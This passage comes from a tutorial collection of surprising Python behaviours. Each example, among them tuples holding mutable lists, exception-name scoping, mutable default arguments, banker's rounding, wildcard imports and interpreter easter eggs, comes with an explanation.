snippet will make things clearer, ```py >>> x = float('nan') >>> x == x, [x] == [x] (False, True) >>> y = float('nan') >>> y == y, [y] == [y] (False, True) >>> x == y, [x] == [y] (False, False) ``` Since the identities of `x` and `y` are different, the values are considered, which are also different; hence the comparison returns `False` this time. - Interesting read: [Reflexivity, and other pillars of civilization](https://bertrandmeyer.com/2010/02/06/reflexivity-and-other-pillars-of-civilization/) --- ### ▶ Mutating the immutable! <!-- Example ID: 15a9e782-1695-43ea-817a-a9208f6bb33d ---> This might seem trivial if you know how references work in Python. ```py some_tuple = ("A", "tuple", "with", "values") another_tuple = ([1, 2], [3, 4], [5, 6]) ``` **Output:** ```py >>> some_tuple[2] = "change this" TypeError: 'tuple' object does not support item assignment >>> another_tuple[2].append(1000) #This throws no error >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000]) >>> another_tuple[2] += [99, 999] TypeError: 'tuple' object does not support item assignment >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000, 99, 999]) ``` But I thought tuples were immutable... #### 💡 Explanation: * Quoting from https://docs.python.org/3/reference/datamodel.html > Immutable sequences An object of an immutable sequence type cannot change once it is created. (If the object contains references to other objects, these other objects may be mutable and may be modified; however, the collection of objects directly referenced by an immutable object cannot change.) * `+=` operator changes the list in-place. The item assignment doesn't work, but when the exception occurs, the item has already been changed in place. * There's also an explanation in [official Python FAQ](https://docs.python.org/3/faq/programming.html#why-does-a-tuple-i-item-raise-an-exception-when-the-addition-works). 
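* Under the hood, `another_tuple[2] += [99, 999]` is two separate steps: an in-place `list.__iadd__` call (which succeeds and mutates the list) followed by an item assignment on the tuple (which fails). A minimal sketch of that decomposition, using a throwaway tuple `t` rather than the snippet above:

    ```py
    t = ([1, 2],)

    # Step 1: the in-place add mutates the list and returns it...
    result = t[0].__iadd__([3, 4])

    # Step 2: ...then Python tries to store the result back into the tuple,
    # and it's this assignment that raises.
    try:
        t[0] = result
    except TypeError as e:
        print(e)   # 'tuple' object does not support item assignment

    print(t)       # ([1, 2, 3, 4],) -- the mutation from step 1 already happened
    ```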
--- ### ▶ The disappearing variable from outer scope <!-- Example ID: 7f1e71b6-cb3e-44fb-aa47-87ef1b7decc8 ---> ```py e = 7 try: raise Exception() except Exception as e: pass ``` **Output (Python 2.x):** ```py >>> print(e) # prints nothing ``` **Output (Python 3.x):** ```py >>> print(e) NameError: name 'e' is not defined ``` #### 💡 Explanation: * Source: https://docs.python.org/3/reference/compound_stmts.html#except When an exception has been assigned using `as` target, it is cleared at the end of the `except` clause. This is as if ```py except E as N: foo ``` was translated into ```py except E as N: try: foo finally: del N ``` This means the exception must be assigned to a different name to be able to refer to it after the except clause. Exceptions are cleared because, with the traceback attached to them, they form a reference cycle with the stack frame, keeping all locals in that frame alive until the next garbage collection occurs. * The clauses are not scoped in Python. Everything in the example is present in the same scope, and the variable `e` got removed due to the execution of the `except` clause. The same is not the case with functions that have their separate inner-scopes. The example below illustrates this: ```py def f(x): del(x) print(x) x = 5 y = [5, 4, 3] ``` **Output:** ```py >>> f(x) UnboundLocalError: local variable 'x' referenced before assignment >>> f(y) UnboundLocalError: local variable 'x' referenced before assignment >>> x 5 >>> y [5, 4, 3] ``` * In Python 2.x, the variable name `e` gets assigned to `Exception()` instance, so when you try to print, it prints nothing. **Output (Python 2.x):** ```py >>> e Exception() >>> print e # Nothing is printed! ``` --- ### ▶ The mysterious key type conversion <!-- Example ID: 00f42dd0-b9ef-408d-9e39-1bc209ce3f36 ---> ```py class SomeClass(str): pass some_dict = {'s': 42} ``` **Output:** ```py >>> type(list(some_dict.keys())[0]) str >>> s = SomeClass('s') >>> some_dict[s] = 40 >>> some_dict # expected: Two different keys-value pairs {'s': 40} >>> type(list(some_dict.keys())[0]) str ``` #### 💡 Explanation: * Both the object `s` and the string `"s"` hash to the same value because `SomeClass` inherits the `__hash__` method of `str` class. * `SomeClass("s") == "s"` evaluates to `True` because `SomeClass` also inherits `__eq__` method from `str` class. * Since both the objects hash to the same value and are equal, they are represented by the same key in the dictionary. * For the desired behavior, we can redefine the `__eq__` method in `SomeClass` ```py class SomeClass(str): def __eq__(self, other): return ( type(self) is SomeClass and type(other) is SomeClass and super().__eq__(other) ) # When we define a custom __eq__, Python stops automatically inheriting the # __hash__ method, so we need to define it as well __hash__ = str.__hash__ some_dict = {'s':42} ``` **Output:** ```py >>> s = SomeClass('s') >>> some_dict[s] = 40 >>> some_dict {'s': 40, 's': 42} >>> keys = list(some_dict.keys()) >>> type(keys[0]), type(keys[1]) (__main__.SomeClass, str) ``` --- ### ▶ Let's see if you can guess this? 
<!-- Example ID: 81aa9fbe-bd63-4283-b56d-6fdd14c9105e ---> ```py a, b = a[b] = {}, 5 ``` **Output:** ```py >>> a {5: ({...}, 5)} ``` #### 💡 Explanation: * According to [Python language reference](https://docs.python.org/3/reference/simple_stmts.html#assignment-statements), assignment statements have the form ``` (target_list "=")+ (expression_list | yield_expression) ``` and > An assignment statement evaluates the expression list (remember that this can be a single expression or a comma-separated list, the latter yielding a tuple) and assigns the single resulting object to each of the target lists, from left to right. * The `+` in `(target_list "=")+` means there can be **one or more** target lists. In this case, target lists are `a, b` and `a[b]` (note the expression list is exactly one, which in our case is `{}, 5`). * After the expression list is evaluated, its value is unpacked to the target lists from **left to right**. So, in our case, first the `{}, 5` tuple is unpacked to `a, b` and we now have `a = {}` and `b = 5`. * `a` is now assigned to `{}`, which is a mutable object. * The second target list is `a[b]` (you may expect this to throw an error because both `a` and `b` have not been defined in the statements before. But remember, we just assigned `a` to `{}` and `b` to `5`). * Now, we are setting the key `5` in the dictionary to the tuple `({}, 5)` creating a circular reference (the `{...}` in the output refers to the same object that `a` is already referencing). Another simpler example of circular reference could be ```py >>> some_list = some_list[0] = [0] >>> some_list [[...]] >>> some_list[0] [[...]] >>> some_list is some_list[0] True >>> some_list[0][0][0][0][0][0] == some_list True ``` Similar is the case in our example (`a[b][0]` is the same object as `a`) * So to sum it up, you can break the example down to ```py a, b = {}, 5 a[b] = a, b ``` And the circular reference can be justified by the fact that `a[b][0]` is the same object as `a` ```py >>> a[b][0] is a True ``` --- ### ▶ Exceeds the limit for integer string conversion ```py >>> # Python 3.10.6 >>> int("2" * 5432) >>> # Python 3.10.8 >>> int("2" * 5432) ``` **Output:** ```py >>> # Python 3.10.6 222222222222222222222222222222222222222222222222222222222222222... >>> # Python 3.10.8 Traceback (most recent call last): ... ValueError: Exceeds the limit (4300) for integer string conversion: value has 5432 digits; use sys.set_int_max_str_digits() to increase the limit. ``` #### 💡 Explanation: This call to `int()` works fine in Python 3.10.6 and raises a ValueError in Python 3.10.8. Note that Python can still work with large integers. The error is only raised when converting between integers and strings. Fortunately, you can increase the limit for the allowed number of digits when you expect an operation to exceed it. To do this, you can use one of the following: - The -X int_max_str_digits command-line flag - The set_int_max_str_digits() function from the sys module - The PYTHONINTMAXSTRDIGITS environment variable [Check the documentation](https://docs.python.org/3/library/stdtypes.html#int-max-str-digits) for more details on changing the default limit if you expect your code to exceed this value. --- ## Section: Slippery Slopes ### ▶ Modifying a dictionary while iterating over it <!-- Example ID: b4e5cdfb-c3a8-4112-bd38-e2356d801c41 ---> ```py x = {0: None} for i in x: del x[i] x[i+1] = None print(i) ``` **Output (Python 2.7- Python 3.5):** ``` 0 1 2 3 4 5 6 7 ``` Yes, it runs for exactly **eight** times and stops. 
#### 💡 Explanation: * Iteration over a dictionary that you edit at the same time is not supported. * It runs eight times because that's the point at which the dictionary resizes to hold more keys (we have eight deletion entries, so a resize is needed). This is actually an implementation detail. * How deleted keys are handled and when the resize occurs might be different for different Python implementations. * So for Python versions other than Python 2.7 - Python 3.5, the count might be different from 8 (but whatever the count is, it's going to be the same every time you run it). You can find some discussion around this [here](https://github.com/satwikkansal/wtfpython/issues/53) or in [this](https://stackoverflow.com/questions/44763802/bug-in-python-dict) StackOverflow thread. * Python 3.7.6 onwards, you'll see `RuntimeError: dictionary keys changed during iteration` exception if you try to do this. --- ### ▶ Stubborn `del` operation <!-- Example ID: 777ed4fd-3a2d-466f-95e7-c4058e61d78e ---> <!-- read-only --> ```py class SomeClass: def __del__(self): print("Deleted!") ``` **Output:** 1\. ```py >>> x = SomeClass() >>> y = x >>> del x # this should print "Deleted!" >>> del y Deleted! ``` Phew, deleted at last. You might have guessed what saved `__del__` from being called in our first attempt to delete `x`. Let's add more twists to the example. 2\. ```py >>> x = SomeClass() >>> y = x >>> del x >>> y # check if y exists <__main__.SomeClass instance at 0x7f98a1a67fc8> >>> del y # Like previously, this should print "Deleted!" >>> globals() # oh, it didn't. Let's check all our global variables and confirm Deleted! {'__builtins__': <module '__builtin__' (built-in)>, 'SomeClass': <class __main__.SomeClass at 0x7f98a1a5f668>, '__package__': None, '__name__': '__main__', '__doc__': None} ``` Okay, now it's deleted :confused: #### 💡 Explanation: + `del x` doesn’t directly call `x.__del__()`. + When `del x` is encountered, Python deletes the name `x` from current scope and decrements by 1 the reference count of the object `x` referenced. `__del__()` is called only when the object's reference count reaches zero. + In the second output snippet, `__del__()` was not called because the previous statement (`>>> y`) in the interactive interpreter created another reference to the same object (specifically, the `_` magic variable which references the result value of the last non `None` expression on the REPL), thus preventing the reference count from reaching zero when `del y` was encountered. + Calling `globals` (or really, executing anything that will have a non `None` result) caused `_` to reference the new result, dropping the existing reference. Now the reference count reached 0 and we can see "Deleted!" being printed (finally!). --- ### ▶ The out of scope variable <!-- Example ID: 75c03015-7be9-4289-9e22-4f5fdda056f7 ---> 1\. ```py a = 1 def some_func(): return a def another_func(): a += 1 return a ``` 2\. ```py def some_closure_func(): a = 1 def some_inner_func(): return a return some_inner_func() def another_closure_func(): a = 1 def another_inner_func(): a += 1 return a return another_inner_func() ``` **Output:** ```py >>> some_func() 1 >>> another_func() UnboundLocalError: local variable 'a' referenced before assignment >>> some_closure_func() 1 >>> another_closure_func() UnboundLocalError: local variable 'a' referenced before assignment ``` #### 💡 Explanation: * When you make an assignment to a variable in scope, it becomes local to that scope. 
So `a` becomes local to the scope of `another_func`, but it has not been initialized previously in the same scope, which throws an error.
* To modify the outer scope variable `a` in `another_func`, we have to use the `global` keyword.

    ```py
    def another_func():
        global a
        a += 1
        return a
    ```

    **Output:**

    ```py
    >>> another_func()
    2
    ```

* In `another_closure_func`, `a` becomes local to the scope of `another_inner_func`, but it has not been initialized previously in the same scope, which is why it throws an error.
* To modify the outer scope variable `a` in `another_inner_func`, use the `nonlocal` keyword. The nonlocal statement is used to refer to variables defined in the nearest outer (excluding the global) scope.

    ```py
    def another_func():
        a = 1
        def another_inner_func():
            nonlocal a
            a += 1
            return a
        return another_inner_func()
    ```

    **Output:**

    ```py
    >>> another_func()
    2
    ```

* The keywords `global` and `nonlocal` tell the Python interpreter not to declare new variables, but to look them up in the corresponding outer scopes instead.
* Read [this](https://sebastianraschka.com/Articles/2014_python_scope_and_namespaces.html) short but awesome guide to learn more about how namespaces and scope resolution work in Python.

---

### ▶ Deleting a list item while iterating
<!-- Example ID: 4cc52d4e-d42b-4e09-b25f-fbf5699b7d4e --->
```py
list_1 = [1, 2, 3, 4]
list_2 = [1, 2, 3, 4]
list_3 = [1, 2, 3, 4]
list_4 = [1, 2, 3, 4]

for idx, item in enumerate(list_1):
    del item

for idx, item in enumerate(list_2):
    list_2.remove(item)

for idx, item in enumerate(list_3[:]):
    list_3.remove(item)

for idx, item in enumerate(list_4):
    list_4.pop(idx)
```

**Output:**
```py
>>> list_1
[1, 2, 3, 4]
>>> list_2
[2, 4]
>>> list_3
[]
>>> list_4
[2, 4]
```

Can you guess why the output is `[2, 4]`?

#### 💡 Explanation:

* It's never a good idea to change the object you're iterating over. If you have to, iterate over a copy of the object instead, and `list_3[:]` does just that.

    ```py
    >>> some_list = [1, 2, 3, 4]
    >>> id(some_list)
    139798789457608
    >>> id(some_list[:])  # Notice that python creates new object for sliced list.
    139798779601192
    ```

**Difference between `del`, `remove`, and `pop`:**

* `del var_name` just removes the binding of the `var_name` from the local or global namespace (that's why `list_1` is unaffected).
* `remove` removes the first matching value, not a specific index; it raises `ValueError` if the value is not found.
* `pop` removes the element at a specific index and returns it; it raises `IndexError` if an invalid index is specified.

**Why is the output `[2, 4]`?**

- The list iteration is done index by index, and when we remove `1` from `list_2` or `list_4`, the contents of the lists are now `[2, 3, 4]`. The remaining elements are shifted down, i.e., `2` is at index 0, and `3` is at index 1. Since the next iteration is going to look at index 1 (which is the `3`), the `2` gets skipped entirely. A similar thing will happen with every alternate element in the list sequence.

* Refer to this StackOverflow [thread](https://stackoverflow.com/questions/45946228/what-happens-when-you-try-to-delete-a-list-element-while-iterating-over-it) explaining the example.
* See also this nice StackOverflow [thread](https://stackoverflow.com/questions/45877614/how-to-change-all-the-dictionary-keys-in-a-for-loop-with-d-items) for a similar example related to dictionaries in Python.
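* A short sketch of the usual safe alternatives (the names here are illustrative, not from the original snippets):

    ```py
    nums = [1, 2, 3, 4]

    # Build a new list instead of mutating the one you're looping over.
    evens = [n for n in nums if n % 2 == 0]   # [2, 4]

    # Or iterate over a copy (the same idea as list_3[:] above) while mutating the original.
    for n in list(nums):
        if n % 2 != 0:
            nums.remove(n)

    print(evens, nums)   # [2, 4] [2, 4]
    ```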
--- ### ▶ Lossy zip of iterators * <!-- Example ID: c28ed154-e59f-4070-8eb6-8967a4acac6d ---> ```py >>> numbers = list(range(7)) >>> numbers [0, 1, 2, 3, 4, 5, 6] >>> first_three, remaining = numbers[:3], numbers[3:] >>> first_three, remaining ([0, 1, 2], [3, 4, 5, 6]) >>> numbers_iter = iter(numbers) >>> list(zip(numbers_iter, first_three)) [(0, 0), (1, 1), (2, 2)] # so far so good, let's zip the remaining >>> list(zip(numbers_iter, remaining)) [(4, 3), (5, 4), (6, 5)] ``` Where did element `3` go from the `numbers` list? #### 💡 Explanation: - From Python [docs](https://docs.python.org/3.3/library/functions.html#zip), here's an approximate implementation of zip function, ```py def zip(*iterables): sentinel = object() iterators = [iter(it) for it in iterables] while iterators: result = [] for it in iterators: elem = next(it, sentinel) if elem is sentinel: return result.append(elem) yield tuple(result) ``` - So the function takes in arbitrary number of iterable objects, adds each of their items to the `result` list by calling the `next` function on them, and stops whenever any of the iterable is exhausted. - The caveat here is when any iterable is exhausted, the existing elements in the `result` list are discarded. That's what happened with `3` in the `numbers_iter`. - The correct way to do the above using `zip` would be, ```py >>> numbers = list(range(7)) >>> numbers_iter = iter(numbers) >>> list(zip(first_three, numbers_iter)) [(0, 0), (1, 1), (2, 2)] >>> list(zip(remaining, numbers_iter)) [(3, 3), (4, 4), (5, 5), (6, 6)] ``` The first argument of zip should be the one with fewest elements. --- ### ▶ Loop variables leaking out! <!-- Example ID: ccec7bf6-7679-4963-907a-1cd8587be9ea ---> 1\. ```py for x in range(7): if x == 6: print(x, ': for x inside loop') print(x, ': x in global') ``` **Output:** ```py 6 : for x inside loop 6 : x in global ``` But `x` was never defined outside the scope of for loop... 2\. ```py # This time let's initialize x first x = -1 for x in range(7): if x == 6: print(x, ': for x inside loop') print(x, ': x in global') ``` **Output:** ```py 6 : for x inside loop 6 : x in global ``` 3\. **Output (Python 2.x):** ```py >>> x = 1 >>> print([x for x in range(5)]) [0, 1, 2, 3, 4] >>> print(x) 4 ``` **Output (Python 3.x):** ```py >>> x = 1 >>> print([x for x in range(5)]) [0, 1, 2, 3, 4] >>> print(x) 1 ``` #### 💡 Explanation: - In Python, for-loops use the scope they exist in and leave their defined loop-variable behind. This also applies if we explicitly defined the for-loop variable in the global namespace before. In this case, it will rebind the existing variable. - The differences in the output of Python 2.x and Python 3.x interpreters for list comprehension example can be explained by following change documented in [What’s New In Python 3.0](https://docs.python.org/3/whatsnew/3.0.html) changelog: > "List comprehensions no longer support the syntactic form `[... for var in item1, item2, ...]`. Use `[... for var in (item1, item2, ...)]` instead. Also, note that list comprehensions have different semantics: they are closer to syntactic sugar for a generator expression inside a `list()` constructor, and in particular, the loop control variables are no longer leaked into the surrounding scope." --- ### ▶ Beware of default mutable arguments! 
<!-- Example ID: 7d42dade-e20d-4a7b-9ed7-16fb58505fe9 ---> ```py def some_func(default_arg=[]): default_arg.append("some_string") return default_arg ``` **Output:** ```py >>> some_func() ['some_string'] >>> some_func() ['some_string', 'some_string'] >>> some_func([]) ['some_string'] >>> some_func() ['some_string', 'some_string', 'some_string'] ``` #### 💡 Explanation: - The default mutable arguments of functions in Python aren't really initialized every time you call the function. Instead, the recently assigned value to them is used as the default value. When we explicitly passed `[]` to `some_func` as the argument, the default value of the `default_arg` variable was not used, so the function returned as expected. ```py def some_func(default_arg=[]): default_arg.append("some_string") return default_arg ``` **Output:** ```py >>> some_func.__defaults__ #This will show the default argument values for the function ([],) >>> some_func() >>> some_func.__defaults__ (['some_string'],) >>> some_func() >>> some_func.__defaults__ (['some_string', 'some_string'],) >>> some_func([]) >>> some_func.__defaults__ (['some_string', 'some_string'],) ``` - A common practice to avoid bugs due to mutable arguments is to assign `None` as the default value and later check if any value is passed to the function corresponding to that argument. Example: ```py def some_func(default_arg=None): if default_arg is None: default_arg = [] default_arg.append("some_string") return default_arg ``` --- ### ▶ Catching the Exceptions <!-- Example ID: b5ca5e6a-47b9-4f69-9375-cda0f8c6755d ---> ```py some_list = [1, 2, 3] try: # This should raise an ``IndexError`` print(some_list[4]) except IndexError, ValueError: print("Caught!") try: # This should raise a ``ValueError`` some_list.remove(4) except IndexError, ValueError: print("Caught again!") ``` **Output (Python 2.x):** ```py Caught! ValueError: list.remove(x): x not in list ``` **Output (Python 3.x):** ```py File "<input>", line 3 except IndexError, ValueError: ^ SyntaxError: invalid syntax ``` #### 💡 Explanation * To add multiple Exceptions to the except clause, you need to pass them as parenthesized tuple as the first argument. The second argument is an optional name, which when supplied will bind the Exception instance that has been raised. Example, ```py some_list = [1, 2, 3] try: # This should raise a ``ValueError`` some_list.remove(4) except (IndexError, ValueError), e: print("Caught again!") print(e) ``` **Output (Python 2.x):** ``` Caught again! list.remove(x): x not in list ``` **Output (Python 3.x):** ```py File "<input>", line 4 except (IndexError, ValueError), e: ^ IndentationError: unindent does not match any outer indentation level ``` * Separating the exception from the variable with a comma is deprecated and does not work in Python 3; the correct way is to use `as`. Example, ```py some_list = [1, 2, 3] try: some_list.remove(4) except (IndexError, ValueError) as e: print("Caught again!") print(e) ``` **Output:** ``` Caught again! list.remove(x): x not in list ``` --- ### ▶ Same operands, different story! <!-- Example ID: ca052cdf-dd2d-4105-b936-65c28adc18a0 ---> 1\. ```py a = [1, 2, 3, 4] b = a a = a + [5, 6, 7, 8] ``` **Output:** ```py >>> a [1, 2, 3, 4, 5, 6, 7, 8] >>> b [1, 2, 3, 4] ``` 2\. ```py a = [1, 2, 3, 4] b = a a += [5, 6, 7, 8] ``` **Output:** ```py >>> a [1, 2, 3, 4, 5, 6, 7, 8] >>> b [1, 2, 3, 4, 5, 6, 7, 8] ``` #### 💡 Explanation: * `a += b` doesn't always behave the same way as `a = a + b`. 
Classes *may* implement the *`op=`* operators differently, and lists do this. * The expression `a = a + [5,6,7,8]` generates a new list and sets `a`'s reference to that new list, leaving `b` unchanged. * The expression `a += [5,6,7,8]` is actually mapped to an "extend" function that operates on the list such that `a` and `b` still point to the same list that has been modified in-place. --- ### ▶ Name resolution ignoring class scope <!-- Example ID: 03f73d96-151c-4929-b0a8-f74430788324 ---> 1\. ```py x = 5 class SomeClass: x = 17 y = (x for i in range(10)) ``` **Output:** ```py >>> list(SomeClass.y)[0] 5 ``` 2\. ```py x = 5 class SomeClass: x = 17 y = [x for i in range(10)] ``` **Output (Python 2.x):** ```py >>> SomeClass.y[0] 17 ``` **Output (Python 3.x):** ```py >>> SomeClass.y[0] 5 ``` #### 💡 Explanation - Scopes nested inside class definition ignore names bound at the class level. - A generator expression has its own scope. - Starting from Python 3.X, list comprehensions also have their own scope. --- ### ▶ Rounding like a banker * Let's implement a naive function to get the middle element of a list: ```py def get_middle(some_list): mid_index = round(len(some_list) / 2) return some_list[mid_index - 1] ``` **Python 3.x:** ```py >>> get_middle([1]) # looks good 1 >>> get_middle([1,2,3]) # looks good 2 >>> get_middle([1,2,3,4,5]) # huh? 2 >>> len([1,2,3,4,5]) / 2 # good 2.5 >>> round(len([1,2,3,4,5]) / 2) # why? 2 ``` It seems as though Python rounded 2.5 to 2. #### 💡 Explanation: - This is not a float precision error, in fact, this behavior is intentional. Since Python 3.0, `round()` uses [banker's rounding](https://en.wikipedia.org/wiki/Rounding#Rounding_half_to_even) where .5 fractions are rounded to the nearest **even** number: ```py >>> round(0.5) 0 >>> round(1.5) 2 >>> round(2.5) 2 >>> import numpy # numpy does the same >>> numpy.round(0.5) 0.0 >>> numpy.round(1.5) 2.0 >>> numpy.round(2.5) 2.0 ``` - This is the recommended way to round .5 fractions as described in [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754#Rounding_rules). However, the other way (round away from zero) is taught in school most of the time, so banker's rounding is likely not that well known. Furthermore, some of the most popular programming languages (for example: JavaScript, Java, C/C++, Ruby, Rust) do not use banker's rounding either. Therefore, this is still quite special to Python and may result in confusion when rounding fractions. - See the [round() docs](https://docs.python.org/3/library/functions.html#round) or [this stackoverflow thread](https://stackoverflow.com/questions/10825926/python-3-x-rounding-behavior) for more information. - Note that `get_middle([1])` only returned 1 because the index was `round(0.5) - 1 = 0 - 1 = -1`, returning the last element in the list. --- ### ▶ Needles in a Haystack * <!-- Example ID: 52a199b1-989a-4b28-8910-dff562cebba9 ---> I haven't met even a single experience Pythonist till date who has not come across one or more of the following scenarios, 1\. ```py x, y = (0, 1) if True else None, None ``` **Output:** ```py >>> x, y # expected (0, 1) ((0, 1), None) ``` 2\. ```py t = ('one', 'two') for i in t: print(i) t = ('one') for i in t: print(i) t = () print(t) ``` **Output:** ```py one two o n e tuple() ``` 3\. ``` ten_words_list = [ "some", "very", "big", "list", "that" "consists", "of", "exactly", "ten", "words" ] ``` **Output** ```py >>> len(ten_words_list) 9 ``` 4\. 
Not asserting strongly enough ```py a = "python" b = "javascript" ``` **Output:** ```py # An assert statement with an assertion failure message. >>> assert(a == b, "Both languages are different") # No AssertionError is raised ``` 5\. ```py some_list = [1, 2, 3] some_dict = { "key_1": 1, "key_2": 2, "key_3": 3 } some_list = some_list.append(4) some_dict = some_dict.update({"key_4": 4}) ``` **Output:** ```py >>> print(some_list) None >>> print(some_dict) None ``` 6\. ```py def some_recursive_func(a): if a[0] == 0: return a[0] -= 1 some_recursive_func(a) return a def similar_recursive_func(a): if a == 0: return a a -= 1 similar_recursive_func(a) return a ``` **Output:** ```py >>> some_recursive_func([5, 0]) [0, 0] >>> similar_recursive_func(5) 4 ``` #### 💡 Explanation: * For 1, the correct statement for expected behavior is `x, y = (0, 1) if True else (None, None)`. * For 2, the correct statement for expected behavior is `t = ('one',)` or `t = 'one',` (missing comma) otherwise the interpreter considers `t` to be a `str` and iterates over it character by character. * `()` is a special token and denotes empty `tuple`. * In 3, as you might have already figured out, there's a missing comma after 5th element (`"that"`) in the list. So by implicit string literal concatenation, ```py >>> ten_words_list ['some', 'very', 'big', 'list', 'thatconsists', 'of', 'exactly', 'ten', 'words'] ``` * No `AssertionError` was raised in 4th snippet because instead of asserting the individual expression `a == b`, we're asserting entire tuple. The following snippet will clear things up, ```py >>> a = "python" >>> b = "javascript" >>> assert a == b Traceback (most recent call last): File "<stdin>", line 1, in <module> AssertionError >>> assert (a == b, "Values are not equal") <stdin>:1: SyntaxWarning: assertion is always true, perhaps remove parentheses? >>> assert a == b, "Values are not equal" Traceback (most recent call last): File "<stdin>", line 1, in <module> AssertionError: Values are not equal ``` * As for the fifth snippet, most methods that modify the items of sequence/mapping objects like `list.append`, `dict.update`, `list.sort`, etc. modify the objects in-place and return `None`. The rationale behind this is to improve performance by avoiding making a copy of the object if the operation can be done in-place (Referred from [here](https://docs.python.org/3/faq/design.html#why-doesn-t-list-sort-return-the-sorted-list)). * Last one should be fairly obvious, mutable object (like `list`) can be altered in the function, and the reassignment of an immutable (`a -= 1`) is not an alteration of the value. * Being aware of these nitpicks can save you hours of debugging effort in the long run. --- ### ▶ Splitsies * <!-- Example ID: ec3168ba-a81a-4482-afb0-691f1cc8d65a ---> ```py >>> 'a'.split() ['a'] # is same as >>> 'a'.split(' ') ['a'] # but >>> len(''.split()) 0 # isn't the same as >>> len(''.split(' ')) 1 ``` #### 💡 Explanation: - It might appear at first that the default separator for split is a single space `' '`, but as per the [docs](https://docs.python.org/3/library/stdtypes.html#str.split) > If sep is not specified or is `None`, a different splitting algorithm is applied: runs of consecutive whitespace are regarded as a single separator, and the result will contain no empty strings at the start or end if the string has leading or trailing whitespace. Consequently, splitting an empty string or a string consisting of just whitespace with a None separator returns `[]`. 
> If sep is given, consecutive delimiters are not grouped together and are deemed to delimit empty strings (for example, `'1,,2'.split(',')` returns `['1', '', '2']`). Splitting an empty string with a specified separator returns `['']`. - Noticing how the leading and trailing whitespaces are handled in the following snippet will make things clear, ```py >>> ' a '.split(' ') ['', 'a', ''] >>> ' a '.split() ['a'] >>> ''.split(' ') [''] ``` --- ### ▶ Wild imports * <!-- Example ID: 83deb561-bd55-4461-bb5e-77dd7f411e1c ---> <!-- read-only --> ```py # File: module.py def some_weird_name_func_(): print("works!") def _another_weird_name_func(): print("works!") ``` **Output** ```py >>> from module import * >>> some_weird_name_func_() "works!" >>> _another_weird_name_func() Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name '_another_weird_name_func' is not defined ``` #### 💡 Explanation: - It is often advisable to not use wildcard imports. The first obvious reason for this is, in wildcard imports, the names with a leading underscore don't get imported. This may lead to errors during runtime. - Had we used `from ... import a, b, c` syntax, the above `NameError` wouldn't have occurred. ```py >>> from module import some_weird_name_func_, _another_weird_name_func >>> _another_weird_name_func() works! ``` - If you really want to use wildcard imports, then you'd have to define the list `__all__` in your module that will contain a list of public objects that'll be available when we do wildcard imports. ```py __all__ = ['_another_weird_name_func'] def some_weird_name_func_(): print("works!") def _another_weird_name_func(): print("works!") ``` **Output** ```py >>> _another_weird_name_func() "works!" >>> some_weird_name_func_() Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'some_weird_name_func_' is not defined ``` --- ### ▶ All sorted? * <!-- Example ID: e5ff1eaf-8823-4738-b4ce-b73f7c9d5511 --> ```py >>> x = 7, 8, 9 >>> sorted(x) == x False >>> sorted(x) == sorted(x) True >>> y = reversed(x) >>> sorted(y) == sorted(y) False ``` #### 💡 Explanation: - The `sorted` method always returns a list, and comparing lists and tuples always returns `False` in Python. - ```py >>> [] == tuple() False >>> x = 7, 8, 9 >>> type(x), type(sorted(x)) (tuple, list) ``` - Unlike `sorted`, the `reversed` method returns an iterator. Why? Because sorting requires the iterator to be either modified in-place or use an extra container (a list), whereas reversing can simply work by iterating from the last index to the first. - So during comparison `sorted(y) == sorted(y)`, the first call to `sorted()` will consume the iterator `y`, and the next call will just return an empty list. ```py >>> x = 7, 8, 9 >>> y = reversed(x) >>> sorted(y), sorted(y) ([7, 8, 9], []) ``` --- ### ▶ Midnight time doesn't exist? <!-- Example ID: 1bce8294-5619-4d70-8ce3-fe0bade690d1 ---> ```py from datetime import datetime midnight = datetime(2018, 1, 1, 0, 0) midnight_time = midnight.time() noon = datetime(2018, 1, 1, 12, 0) noon_time = noon.time() if midnight_time: print("Time at midnight is", midnight_time) if noon_time: print("Time at noon is", noon_time) ``` **Output (< 3.5):** ```py ('Time at noon is', datetime.time(12, 0)) ``` The midnight time is not printed. #### 💡 Explanation: Before Python 3.5, the boolean value for `datetime.time` object was considered to be `False` if it represented midnight in UTC. 
It is error-prone when using the `if obj:` syntax to check if the `obj` is null or some equivalent of "empty." --- --- ## Section: The Hidden treasures! This section contains a few lesser-known and interesting things about Python that most beginners like me are unaware of (well, not anymore). ### ▶ Okay Python, Can you make me fly? <!-- Example ID: a92f3645-1899-4d50-9721-0031be4aec3f ---> Well, here you go ```py import antigravity ``` **Output:** Sshh... It's a super-secret. #### 💡 Explanation: + `antigravity` module is one of the few easter eggs released by Python developers. + `import antigravity` opens up a web browser pointing to the [classic XKCD comic](https://xkcd.com/353/) about Python. + Well, there's more to it. There's **another easter egg inside the easter egg**. If you look at the [code](https://github.com/python/cpython/blob/master/Lib/antigravity.py#L7-L17), there's a function defined that purports to implement the [XKCD's geohashing algorithm](https://xkcd.com/426/). --- ### ▶ `goto`, but why? <!-- Example ID: 2aff961e-7fa5-4986-a18a-9e5894bd89fe ---> ```py from goto import goto, label for i in range(9): for j in range(9): for k in range(9): print("I am trapped, please rescue!") if k == 2: goto .breakout # breaking out from a deeply nested loop label .breakout print("Freedom!") ``` **Output (Python 2.3):** ```py I am trapped, please rescue! I am trapped, please rescue! Freedom! ``` #### 💡 Explanation: - A working version of `goto` in Python was [announced](https://mail.python.org/pipermail/python-announce-list/2004-April/002982.html) as an April Fool's joke on 1st April 2004. - Current versions of Python do not have this module. - Although it works, but please don't use it. Here's the [reason](https://docs.python.org/3/faq/design.html#why-is-there-no-goto) to why `goto` is not present in Python. --- ### ▶ Brace yourself! <!-- Example ID: 5c0c75f2-ddd9-4da3-ba49-c4be7ec39acf ---> If you are one of the people who doesn't like using whitespace in Python to denote scopes, you can use the C-style {} by importing, ```py from __future__ import braces ``` **Output:** ```py File "some_file.py", line 1 from __future__ import braces SyntaxError: not a chance ``` Braces? No way! If you think that's disappointing, use Java. Okay, another surprising thing, can you find where's the `SyntaxError` raised in `__future__` module [code](https://github.com/python/cpython/blob/master/Lib/__future__.py)? #### 💡 Explanation: + The `__future__` module is normally used to provide features from future versions of Python. The "future" in this specific context is however, ironic. + This is an easter egg concerned with the community's feelings on this issue. + The code is actually present [here](https://github.com/python/cpython/blob/025eb98dc0c1dc27404df6c544fc2944e0fa9f3a/Python/future.c#L49) in `future.c` file. + When the CPython compiler encounters a [future 